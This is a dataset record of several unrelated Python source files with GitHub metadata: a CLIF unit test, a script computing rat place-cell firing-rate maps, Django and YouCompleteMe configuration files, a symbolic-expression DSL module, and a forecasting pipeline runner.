from clif.testing.python import imported_methods
class InheritedConstructorsTest(unittest.TestCase):
def testInheritedConstructor(self):
d = imported_methods.Derived(12345)
self.assertEqual(d.GetA(), 12345)
self.assertEqual(d.GetAWithOffset(43210), 55555)
if __name__ == '__main__':
unittest.main()
|
[
"mrovner@google.com"
] |
mrovner@google.com
|
81f8e0ee87794f469abaa56ecaa9a35b05cecdf7
|
33d9426e8450cc0c9a0e1f377383c066a2e9b7f0
|
/Proceso_De_Todos_los_Datos.py
|
25c788d53679b366f83c9b579c2297d6d3ddf05b
|
[] |
no_license
|
tomasgarcianeuro/Funtions_Neuro
|
33d5ffd08b6780357e692a70ebaad81c80de9c96
|
39ce501bf9a68ea96249a8f41c7d2f077a13898e
|
refs/heads/main
| 2023-01-19T20:53:03.778169
| 2020-10-26T14:47:56
| 2020-10-26T14:47:56
| 307,396,435
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,927
|
py
|
import numpy as np
import matplotlib.pyplot as plt
import pickle
from scipy.ndimage import gaussian_filter as gauss_fil
from os import listdir
# =============================================================================
# NO CORRER_ USADO COMO PLANTILLA PARA DEMOSTRACION A SUB DIR SEGUN CLAUSULA map(lambda arg: arg/2, [12, 12 ,12])
# SUB DIR SE REHUSA A CREER EN EL DEBUGGEAR ()
# =============================================================================
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Inicializaciones fundamentales """""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""INICIALIZANDO VECTOR TEMPORAL"""
Eje_Temporal=np.zeros(Diccionario["Posicion"].T.shape[1])
for i in range(Eje_Temporal.shape[0]):
Eje_Temporal[i]=400*(i+1)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Funciones """""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""Division de vector disparo en cluster"""
def Division_luz_oscuridad(clu,Tiempo_Luz_oscuridad):
"""La funcion logra separar, a pártir de una columna clu (donde se encuentran los tiempos de los picos para un cluster), en dos columnas (dentro
de un diccionario cada una con los tiempos en los que se disparo el cluster, pero ya discriminados en luz y oscuridad"""
inicio=0 #Tiempo en que inicia el periodo de luz u oscuridad
final=0 # Tiempo en que finaliza el periodo de luz u oscuridad
cluster_aux={}
cluster_aux['Luz']={}
cluster_aux['Oscuridad']={}
luz=0 #variable para individualizar los l1,l2,l3,l4 etc.
oscuridad=0
inicio=float(Tiempo_Luz_oscuridad[0][2]) #Determino donde inica el evento
for i in range(Tiempo_Luz_oscuridad.shape[0]):
final=float(Tiempo_Luz_oscuridad[i][3]) #Donde finaliza el evento
if Tiempo_Luz_oscuridad[i][1][0]=="l": #Determino si estamos en luz "l" y oscuridad "d"
tipo_luz=str(Tiempo_Luz_oscuridad[i][1][:2])+".{}"
cluster_aux["Luz"][tipo_luz.format(str(luz))]=clu[np.argmax(clu>inicio):np.argmin(clu<final)] #Agrego al cluster correspondiente los picos correspondienes
inicio=final;luz+=1 # al periodo de luz
else:
tipo_oscuridad=str(Tiempo_Luz_oscuridad[i][1][:2])+".{}"
cluster_aux["Oscuridad"][tipo_oscuridad.format(str(oscuridad))]=clu[np.argmax(clu>inicio):np.argmin(clu<final)] #Agrego al cluster correspondiente los picos correspondienes
inicio=final;oscuridad+=1
return cluster_aux
def Division_clu_(Cluster,tiempo):
""""Funcion que crea un diccionario con el tiempo de disparo de cada cluster """
num_clu=int(Cluster[0]) #Numero de clusters
Cluster=np.delete(Cluster,0) #Elimino la primera fila que indica el numero de cluster
Cluster=Cluster.reshape([Cluster.shape[0] ,1])
tiempo=tiempo.reshape([ tiempo.shape[0] ,1])
Cluster=np.append(Cluster,tiempo,1)
CLUSTERS={}
for i in range(num_clu+1): #Creeo el diccionario de los clusters
Nombre_Vector="Cluster Numero {}"
CLUSTERS[Nombre_Vector.format(i)]=np.array([])
#LLeno los culster
for i in range(Cluster.shape[0]):
Num_clu=Cluster[i][0] #Asigno a Num_clu el identificador de cluster que se activo
Num_time=Cluster[i][1] #Asigno a Num_time el tiempo de cluster que se activo referido a Num_clu
Nombre_Vector="Cluster Numero {}"
CLUSTERS[Nombre_Vector.format(int(Num_clu))]=np.append(CLUSTERS[Nombre_Vector.format(int(Num_clu))],Num_time)
return CLUSTERS
def Division_global(Cluster,tiempo,tiempo_l_o):
"""La funcion se apoya en las dos funciones anteriores (Division_clu_ y Division_luz_oscuridad) para devolver un diccionario, que a su vez contiene
otros diccionarios en la cual tenemos una organizacion de la sigiente manera:
Dentro del diccionario principal tenemos n diccionarios (siendo n el numero de cluster)
Dentro de cada uno de esos diccionarios tenemos dos diccionarios más, cada uno con los valores temporales en los que se disparo dicho cluster
cuando el sujeto se encontraba en luz u oscuridad (dependiendo del diccionario al que pertenece)"""
num_clu=int(Cluster[0])
Cluster_Principal=Division_clu_(Cluster, tiempo) #Creo el diccionario principal
clu_aux={}
for i in range(num_clu):
clu_aux=Division_luz_oscuridad(Cluster_Principal["Cluster Numero {}".format(i+1)],tiempo_l_o)
Cluster_Principal["Cluster Numero {}".format(i+1)]=clu_aux
return Cluster_Principal
def Cargar(name):
"""Cargar archivos"""
with open (name, "rb") as hand:
dic=pickle.load(hand)
return dic
def Guardar(name,objecto):
with open (name, "wb") as hand:
dic=pickle.dump(objecto,hand)
"""Cálculo de tasa de disparo, etc."""
def Disparos(clu,time):
"""Funcion que crea un vector donde cada elemento es un numero entero que representa el lugar donde estaba el SUJETO
cuando se registro el disparo. Esto es, los elementos del vector representan el INDICE
en el Eje_Temporal en el que sucedio el disparo."""
posicion_disparo=np.array([])
j=0
for i in range(clu.shape[0]):
Condicion=True
while Condicion:
if (clu[i]>=time[j] and clu[i]<time[j+1]):
posicion_disparo=np.insert(posicion_disparo,posicion_disparo.shape[0],j)
break
j+=1
return posicion_disparo
def Cuentas(disp_clu,posx,posy,bins):
"""Funcion que determina el número total de disparos den un determinado lugar fisico. Se representa por medio de
una matriz"""
X=list(posx)
Y=list(posy)
Tasa_disparo=np.zeros([int(900/bins),int(900/bins)])
for i in range(disp_clu.shape[0]):
Tasa_disparo[int(Y[int(disp_clu[i])]/bins)][int(X[int(disp_clu[i])]/bins)]+=1
return Tasa_disparo
def Tiempo(posx,posy,bins):
"""Funcion que determina el tiempo total que el animal paso en un determinado lugar fisico. Se representa por medio
de una matriz"""
X=list(posx)
Y=list(posy)
Tasa_disparo=np.zeros([int(900/bins),int(900/bins)])
for i in range(posx.shape[0]):
if (Y[i]!=-1 or X[i]!=-1):
Tasa_disparo[int(Y[i]/bins)][int(X[i]/bins)]+=400
return Tasa_disparo #Se divide por 20k para obtener la matriz expresada en segundos
def Tiempo_2(Dicc,bins,type_fuente):
"""Funcion que determina el tiempo total que el animal paso en un determinado lugar fisico en unos determinados
intervalos. Se representa por medio de una matriz"""
Tasa_disparo=np.zeros([int(900/bins),int(900/bins)])
for i in range(60):
if Dicc["Light_Trials"][i][1]==type_fuente:
X=list(Dicc["Posicion"].T[0][int(int(Dicc["Light_Trials"][i][2])/400):int(int(Dicc["Light_Trials"][i][3])/400)+1])
Y=list(Dicc["Posicion"].T[1][int(int(Dicc["Light_Trials"][i][2])/400):int(int(Dicc["Light_Trials"][i][3])/400)+1])
for i in range(len(X)):
if (Y[i]!=-1 or X[i]!=-1):
Tasa_disparo[int(Y[i]/bins)][int(X[i]/bins)]+=400
return Tasa_disparo/20000 #Se divide por 20k para obtener la matriz expresada en segundos
def Tasa_disparo(cuenta,tiempo):
"""Funcion que determina la tasa de disparo"""
#La variable tiempo es el Eje_temporal
tasa_verdadera=np.zeros(cuenta.shape)
for i in range(cuenta.shape[0]):
for j in range(cuenta.shape[0]):
if tiempo[i][j]!=0:
tasa_verdadera[i][j]=cuenta[i][j]/tiempo[i][j]
return tasa_verdadera
def Cluster_type_light_(Diccionario,bins,luz_oscuridad,type_fuente,num_clu,Eje_Temporal):
Disparos_clu=np.array([])
fuente="{}{}".format(str(type_fuente),".{}")
for i in range(30):
if fuente.format(i) in Diccionario["Cluster Numero {}".format(str(num_clu))][luz_oscuridad]:
Disparos_clu=np.concatenate((Disparos_clu,Diccionario["Cluster Numero {}".format(str(num_clu))][luz_oscuridad][fuente.format(i)]))
Shots_clu=Disparos(Disparos_clu, Eje_Temporal) #Determino los disparos
Cuenta=Cuentas(Shots_clu,Diccionario["Posicion"].T[0], Diccionario["Posicion"].T[1], bins)
Time=Tiempo_2(Diccionario, bins,type_fuente) #Tiempo del individuo en una determinada posicion
Tasa_de_disparo=Tasa_disparo(Cuenta, Time)
Imagen_Filtrada=gauss_fil(Tasa_de_disparo, 3)
plt.imshow(Imagen_Filtrada,cmap="jet")
# plt.imshow(Tasa_de_disparo,cmap="jet")
def Generador_Dicc(Datos_brutos):
"""Funcion que genera los diccionarios a utilizar. Dicha funcion recibe como entrada a los nombres de los experimentos"""
for k in Datos_brutos:
datos={}
Nombre_animales="/home/tomasg/Escritorio/Neuro/data_perez_escobar_2016/circular_arena/{}" #Debo indicar el nombre del animal
List_ses=listdir(Nombre_animales.format(k))
Sessiones=[] #Creo la lista de sessiones
for i in List_ses:
Ses=i[i.find("-")+1:i.find("2015")]
Sessiones.append(Ses)
Nombre2="/home/tomasg/Escritorio/Neuro/data_perez_escobar_2016/circular_arena/{}/{}-{}2015-0108/{}-{}2015-0108.{}"
Nombre1="{}-{}2015-0108".format(k,"{}")
Nombre_clu=Nombre2.format(k,k,"{}",k,"{}","clu")
Nombre_res=Nombre2.format(k,k,"{}",k,"{}","res")
Nombre_light=Nombre2.format(k,k,"{}",k,"{}","light_trials_intervals")
Nombre_whl=Nombre2.format(k,k,"{}",k,"{}","whl")
#En el siguiente apartado cargo los datos principales para refinar los datos
for i in Sessiones:
datos[Nombre1.format(i)]={"Clu":np.loadtxt(Nombre_clu.format(i,i)),"Res":np.loadtxt(Nombre_res.format(i,i)),"Light":np.loadtxt(Nombre_light.format(i,i),dtype=str)}
"""Cargo los archivos"""
#Abajo indico la ruta y el nombre con el que se guardaran los archivos
Nombre_Guardar="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/Diccionarios_Datos/{}/Diccionario_{}"
"""Refino y guardo los datos"""
Dic={}
for l in Sessiones:
Dic=Division_global(datos[Nombre1.format(l)]["Clu"], datos[Nombre1.format(l)]["Res"], datos[Nombre1.format(l)]["Light"])
Dic["Posicion"]=np.loadtxt(Nombre_whl.format(l,l)) #Agrego al diccionario los datos de la posicion
Dic["Light_Trials"]=datos[Nombre1.format(l,l)]["Light"] #Agrego al diccionario los datos de intervalos de luz y oscuridad utilizados
Guardar(Nombre_Guardar.format(k,l),Dic) # l es la session donde se guarda y k el codigo del animal
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Genero los diccionarios principales"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Animal=['jp2142', 'jp21414']
Generador_Dicc(Animal)
Nombre1="jp19844-{}2015-0108" #Codigo principal que hace referencia al nombre de la rata
jp19844={}
Sessiones=["0908","1108","1208","1308","2008","2608"] #Fechas de las sessiones de grabacion
Nombre_clu="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.clu".format(Nombre1)
Nombre_res="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.res".format(Nombre1)
Nombre_light="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.light_trials_intervals".format(Nombre1)
Nombre_whl="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.whl".format(Nombre1)
#En el siguiente apartado cargo los datos principales para refinar los datos
for i in Sessiones:
jp19844[Nombre1.format(i)]={"Clu":np.loadtxt(Nombre_clu.format(str(i))),"Res":np.loadtxt(Nombre_res.format(str(i))),"Light":np.loadtxt(Nombre_light.format(str(i)),dtype=str)}
"""Cargo los archivos"""
#Abajo indico la ruta y el nombre con el que se guardaran los archivos
Nombre_Guardar="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/Diccionarios_Datos/jp19844/Diccionario_{}"
"""Refino y guardo los datos"""
Dic={}
for l in Sessiones:
Dic=Division_global(jp19844[Nombre1.format(l)]["Clu"], jp19844[Nombre1.format(l)]["Res"], jp19844[Nombre1.format(l)]["Light"])
Dic["Posicion"]=np.loadtxt(Nombre_whl.format(l)) #Agrego al diccionario los datos de la posicion
Dic["Light_Trials"]=jp19844[Nombre1.format(l)]["Light"] #Agrego al diccionario los datos de intervalos de luz y oscuridad utilizados
Guardar(Nombre_Guardar.format(l),Dic)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Calculo de tasa de disparo"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""En esta parte del codigo determino la tasa de disparo de la siguiente manera:
1) Determino una matriz con los disparos para UN cluster
la matriz es una representacion cuadricular del espacio. Cada elemento de la matriz representa una porcion del espacio físico por donde el animal se mueve
2) Determino una matriz del mismo tamaño con el tiempo que estuvo el animal en dicho lugar físico
3) Determino, con una division elemento a elemento, la tasa de disparo del animal en dicho lugar
4) A la matriz resultante Tasa_de_disparo le aplico un filtro gaussiano para suavizar la imagen
5) Grafico el resultado """
#Antes que nada se cargan los elementos a aplicar el proceso antes descripto
# =============================================================================
# Modo MANUAL, modo de ejemplo solicitado por Sub. Dir
# =============================================================================
Name="jp5519"
Datos_Animal="{}/Diccionario_{}".format(Name,"0610")
Nombre_Carga="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/Diccionarios_Datos/{}".format(Datos_Animal)
Diccionario=Cargar(Nombre_Carga) #Cargo el diccionario generado anteriormente
"""CONCATENO LOS INTERVALOS EN LOS QUE SE UTILIZO LA MISMA LUZ l2 O l4"""
Disparos_clu=np.array([])
for i in range(30):
#if fuente.format(i) in Diccionario["Cluster Numero {}".format(str(num_clu))][luz_oscuridad]:
Disparos_clu=np.concatenate((Disparos_clu,Diccionario["Cluster Numero 6"]["Luz"]["l2.{}".format(i)]))
"""PROCESO LOS DATOS PARA LA MISMA LUZ l2 O l4"""
Shots_clu=Disparos(Disparos_clu, Eje_Temporal) #Determino los disparos
Cuenta=Cuentas(Shots_clu,Diccionario["Posicion"].T[0], Diccionario["Posicion"].T[1], 25.0001)
Time=Tiempo_2(Diccionario["Posicion"].T[0], Diccionario["Posicion"].T[1], 25.0001) #Tiempo del individuo en una determinada posicion
Tasa_de_disparo=Tasa_disparo(Cuenta, Time)
Imagen_Filtrada=gauss_fil(Tasa_de_disparo, 1)
plt.imshow(Imagen_Filtrada,cmap="jet")
plt.imshow(Tasa_de_disparo,cmap="jet")
#plt.imshow(Tasa_de_disparo,cmap="jet",vmin=0,vmax=1)
#plt.imshow(Imagen_Filtrada,cmap="jet",vmin=0,vmax=1)
|
[
"noreply@github.com"
] |
tomasgarcianeuro.noreply@github.com
|
c32fdb4787b51913dcb94e2128d2912fad182b06
|
3b871bdc672632e72bbdb72f98c914db660829b4
|
/Django_Project/Django_Project/asgi.py
|
5eb588cf3ef16a21bf99a45c2a9698189ff79917
|
[] |
no_license
|
JasbirCodeSpace/Django-Blog-Web-App
|
b1a58730a17c204fe4c8ad8ab4f3f1d47d5b30e1
|
6af67d03bbec997b972feacb2873efaa542becaa
|
refs/heads/master
| 2022-08-25T23:12:05.591494
| 2020-05-20T07:19:48
| 2020-05-20T07:19:48
| 264,860,882
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
py
|
"""
ASGI config for Blog project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Django_Project.settings')
application = get_asgi_application()
|
[
"shikhawat.jasbir@gmail.com"
] |
shikhawat.jasbir@gmail.com
|
c292ededc8a2ccc3333ba607b656b58dd2f5efe0
|
3def38a9c4e148fbec899d8e6115cdefb61ceead
|
/.ycm_extra_conf.py
|
6cbf0f0a59f53d4b04046f1885363df2db3fdae4
|
[] |
no_license
|
shinew/configs
|
a2a7e8eca6dc25c5f5d097d6e4d11d43f3c2adff
|
d910c8935c0d302dd80e116c1740b32e22e1b7ce
|
refs/heads/master
| 2021-03-27T15:50:50.334607
| 2018-03-31T00:19:30
| 2018-03-31T00:19:30
| 55,921,635
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,562
|
py
|
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
'-Werror',
#'-Wc++98-compat',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
'-DNDEBUG',
# THIS IS IMPORTANT! Without a "-std=<something>" flag, clang won't know which
# language to use when compiling headers. So it will guess. Badly. So C++
# headers will be compiled as C headers. You don't want that so ALWAYS specify
# a "-std=<something>".
# For a C project, you would set this to something like 'c99' instead of
# 'c++11'.
'-std=c++14',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c++',
# Here are the system includes, found by: 'echo | clang -v -E -x c++ -'
'-isystem',
'/Library/Developer/CommandLineTools/usr/bin/../include/c++/v1',
'-isystem',
'/usr/local/include',
'-isystem',
'/Library/Developer/CommandLineTools/usr/lib/clang/9.1.0/include',
'-isystem',
'/Library/Developer/CommandLineTools/usr/include',
'-isystem',
'/usr/include',
#'-isystem',
#'/usr/local/lib',
# '-isystem',
# os.path.join(os.environ['GTEST_DIR'], 'include'),
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
|
[
"shine.sw.wang@gmail.com"
] |
shine.sw.wang@gmail.com
|
44a6e5f1f5fda5f40b242e469cc4314b106c8306
|
e6b969b7c50de5ae61c4b76ec31a982d16523e46
|
/sym.py
|
3f88fe9fcc929640105de765ca5654c69c9dd65f
|
[] |
no_license
|
dlovemore/parle
|
7d52dc76716f3f8a5f085aa26277b2c52b98b098
|
e949c743b2760079eb3c3eb67198e69562521d20
|
refs/heads/master
| 2021-01-03T07:04:09.060552
| 2020-10-20T13:01:59
| 2020-10-20T13:01:59
| 239,972,201
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,418
|
py
|
class Base:
def __init__(self, *args):
self._args = args
@property
def args(self): return self._args
@args.setter
def args(self, value): self._args = value
def __repr__(self):
rargs = repr(list(self.args))[1:-1]
return f'{type(self).__name__}({rargs})'
class E(Base):
@property
def op(self):
return self.args[0]
@property
def exprs(self):
return self.args[1:]
@property
def lhs(self):
return self.args[1]
@property
def rhs(self):
return self.args[2]
@property
def a1(self):
return self.args[1]
@property
def a2(self):
return self.args[2]
def __add__(self, rhs):
return E('+',self,rhs)
def __contains__(self, lhs):
return E(' in ',lhs,self)
def __truediv__(self, rhs):
return E('/',self,rhs)
def __floordiv__(self, rhs):
return E('//',self,rhs)
def __and__(self, rhs):
return E('&',self,rhs)
def __xor__(self, rhs):
return E('^',self,rhs)
def __invert__(self):
return E('~_',self)
def __or__(self, rhs):
return E('|',self,rhs)
def __pow__(self, rhs):
return E('**',self,rhs)
def __getitem__(self, k):
return E('[]',self, k)
def __lshift__(self, rhs):
return E('<<',self, rhs)
def __mod__(self, rhs):
return E('%',self, rhs)
def __mul__(self, rhs):
return E('*',self, rhs)
def __matmul__(self, rhs):
return E('@',self, rhs)
def __neg__(self):
return E('-_',self)
def __pos__(self):
return E('+_',self)
def __rshift__(self, rhs):
return E('>>',self, rhs)
def __sub__(self, rhs):
return E('-',self, rhs)
def __lt__(self, rhs):
return E('<',self, rhs)
def __le__(self, rhs):
return E('<=',self, rhs)
def __eq__(self, rhs):
return E('==',self, rhs)
def __ne__(self, rhs):
return E('!=',self, rhs)
def __ge__(self, rhs):
return E('>=',self, rhs)
def __gt__(self, rhs):
return E('>',self, rhs)
def __call__(self, *args):
return E('_()',self, *args)
def dolet(k,v): return E('=',k,v)
class LetClause(Base):
def __getitem__(self, k):
if isinstance(k,tuple):
k=E(',',*k)
return E('=',E('args',*self.args), k)
class Let:
def __setitem__(self,k,v):
stmts += dolet(k,v)
def __call__(self,*args):
return LetClause(*args)
let=Let()
class Stmt:
def __init__(self,k):
self.op = k
def __getitem__(self, k):
if isinstance(k,tuple):
k=E(',',*k)
return E(self.op, k)
# Use like:
# let(x)[x+1]
# or [let(x)[4], let(Y)[X+1]]
class Env:
def __init__(self, globals, op='var'):
self.globals=globals
self.vars=dict()
self.op=op
def __call__(self, name):
if name not in self.vars:
v=E(self.op, name)
self.globals[name]=v
self.vars[name]=v
return self.vars[name]
def __getattr__(self, name):
return self(name)
var=Env(globals())
v=var
arg=var
class OnClause:
def __init__(self, e):
self.e=e
def __getitem__(self, rhs):
if isinstance(rhs, slice):
assert(rhs.step is None)
return E('?:', self.e, rhs.start, rhs.stop)
else:
return E('?', self.e, rhs)
class On:
def __call__(self, e):
return OnClause(e)
on=On()
IF=on
class LambdaClause:
def __init__(self, *args):
self.args=args
def __getitem__(self, rhs):
return E('λ',self.args,rhs)
class LambdaDefiner:
def __call__(self, *args):
return LambdaClause(args)
λ=LambdaDefiner()
class Ref:
def __init__(self, r, uid):
self.refmaker = r
self.uid = uid
def __matmul__(self, rhs):
if self in self.refmaker.rees:
raise RuntimeError
self.refmaker.rees[self]=rhs
return rhs
def __repr__(self):
return f'{self.uid}@R'
class RefMaker:
def __init__(self):
self.refs = dict() # uid->ref
self.rees = dict() # ref->referee
def __rmatmul__(self, uid):
"Handles uid@self"
if uid not in self.refs:
self.refs[uid] = Ref(self,uid)
return self.refs[uid]
def save(x):
seen=set()
many=set()
def mr(x):
if id(x) in seen:
many.add(id(x))
else:
seen.add(id(x))
if isinstance(x, Base):
for a in x.args:
mr(a)
mr(x)
uids=dict() # ref id->ids
uid=1
def pr(x):
nonlocal uid
s=''
if id(x) in many:
if id(x) in uids:
return f'{uids[id(x)]}@R'
else:
uids[id(x)]=uid
s+=f'{uid}@R@'
uid+=1
if isinstance(x, Base):
first=True
s+=f'{type(x).__name__}('
for arg in x.args:
if first: first=False
else: s+=','
s+=pr(arg)
s+=')'
else:
s+=repr(x)
return s
return pr(x)
def load(s):
global R
R=RefMaker()
b=eval(s)
seen=set()
def resolve(x):
if id(x) not in seen:
seen.add(id(x))
if isinstance(x, Base):
x.args=[resolve(a) for a in x.args]
if isinstance(x, Ref):
return R.rees[x]
else:
return x
resolve(b)
return b
# >>> from sym import *
# >>> X=var.X
# >>> print(v.Y)
# E('var', 'Y')
# >>> a=[1,2]
# >>> a[0]=3
# >>> a[0]+=3
# >>> E('a','var')[3]
# E('[]', E('a', 'var'), 3)
# >>> a=v.a
# >>> a[0]
# E('[]', E('var', 'a'), 0)
# >>> v.X<v.Y
# E('<', E('var', 'X'), E('var', 'Y'))
# >>> v.X[v.X+1,]
# E('[]', E('var', 'X'), (E('+', E('var', 'X'), 1),))
# >>>
# >>> globals()['ai']=12
# >>> ai
# 12
# >>>
# >>> on(X)[3:4]
# E('?:', E('var', 'X'), 3, 4)
# >>> on(X)[3]
# E('?', E('var', 'X'), 3)
# >>> E(E('X','var'),'?',3)
# E(E('X', 'var'), '?', 3)
# >>> var.A
# E('var', 'A')
# >>> A
# Traceback (most recent call last):
# File "<console>", line 1, in <module>
# NameError: name 'A' is not defined
# >>> var=Env(globals())
# >>> var.A
# E('var', 'A')
# >>> A
# E('var', 'A')
# >>> E
# <class 'sym.E'>
# >>>
# >>> [getattr(var,x) for x in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ']
# [E('var', 'A'), E('var', 'B'), E('var', 'C'), E('var', 'D'), E('var', 'E'), E('var', 'F'), E('var', 'G'), E('var', 'H'), E('var', 'I'), E('var', 'J'), E('var', 'K'), E('var', 'L'), E('var', 'M'), E('var', 'N'), E('var', 'O'), E('var', 'P'), E('var', 'Q'), E('var', 'R'), E('var', 'S'), E('var', 'T'), E('var', 'U'), E('var', 'V'), E('var', 'W'), E('var', 'X'), E('var', 'Y'), E('var', 'Z')]
# >>> A
# E('var', 'A')
# >>> E
# E('var', 'E')
# >>> import fun
# >>> fun.E
# <class 'parle.sym.E'>
# >>> var.E
# E('var', 'E')
# >>> fun.E
# <class 'parle.sym.E'>
# >>> λ(X)[X+1]
# E('λ', ((E('var', 'X'),),), E('+', E('var', 'X'), 1))
# >>>
# >>>
# >>> let(X)
# LetClause(E('var', 'X'))
# >>> let(X)[X+1]
# E('=', E('args', E('var', 'X')), E('+', E('var', 'X'), 1))
# >>> LET=Stmt('let')
# >>>
# >>> LET(X)
# Traceback (most recent call last):
# File "<console>", line 1, in <module>
# TypeError: 'Stmt' object is not callable
# >>> LET[X]
# E('let', E('var', 'X'))
# >>>
|
[
"davidlovemore@gmail.com"
] |
davidlovemore@gmail.com
|
9b51264685632fddec2373e3a341f25d8d1d3fc9
|
e00fe1e065b448f6f8c0472ed2b8a39991fa7b1b
|
/Fuzzy_clustering/version2/template/project_run.py
|
4188a8c1f9dfdd2d18eda05f8e884d4dcc2f62af
|
[
"Apache-2.0"
] |
permissive
|
joesider9/forecasting_library
|
1a4ded5b09fc603f91fa1c075e79fc2ed06c08a8
|
db07ff8f0f2693983058d49004f2fc6f8849d197
|
refs/heads/master
| 2023-03-29T12:18:22.261488
| 2021-04-01T08:57:08
| 2021-04-01T08:57:08
| 319,906,316
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,106
|
py
|
from Fuzzy_clustering.version2.project_managers.project_eval_manager import ProjectsEvalManager
from Fuzzy_clustering.version2.project_managers.projects_data_manager import ProjectsDataManager
from Fuzzy_clustering.version2.project_managers.projects_train_manager import ProjectsTrainManager
from Fuzzy_clustering.version2.template.constants import *
from Fuzzy_clustering.version2.template.util_database_timos import write_database
def prepare_data():
static_data = write_database()
project_data_manager = ProjectsDataManager(static_data, is_test=False)
nwp_response = project_data_manager.nwp_extractor()
if nwp_response == DONE:
data_response = project_data_manager.create_datasets()
else:
raise RuntimeError('Something was going wrong with nwp extractor')
if data_response == DONE:
project_data_manager.create_projects_relations()
else:
raise RuntimeError('Something was going wrong with data manager')
if hasattr(project_data_manager, 'data_eval'):
project_data_manager.is_test = True
nwp_response = project_data_manager.nwp_extractor()
if nwp_response == DONE:
nwp_response = project_data_manager.create_datasets()
if nwp_response != DONE:
raise RuntimeError('Something was going wrong with on evaluation dataset creator')
else:
raise RuntimeError('Something was going wrong with nwp extractor on evaluation')
print("Data is prepared, training can start")
def train_project():
static_data = write_database()
project_train_manager = ProjectsTrainManager(static_data)
project_train_manager.fit()
def eval_project():
static_data = write_database()
project_eval_manager = ProjectsEvalManager(static_data)
project_eval_manager.evaluate()
def backup_project():
static_data = write_database()
project_backup_manager = ProjectsTrainManager(static_data)
project_backup_manager.clear_backup_projects()
if __name__ == '__main__':
prepare_data()
train_project()
eval_project()
backup_project()
|
[
"joesider9@gmail.com"
] |
joesider9@gmail.com
|
7aa9a5b9b241ba9dc321a5f3fd7bbbd8dc028125
|
4a2b457f13628ebbf3cd379202b5354fa73bf1e5
|
/Python_3/Modulo 3/4 - Funções em Python/Exercício_100_Funções_para_sortear_e_somar.py
|
37bfc675f73b9a65e8824473012ac0d3d6939c9c
|
[
"MIT"
] |
permissive
|
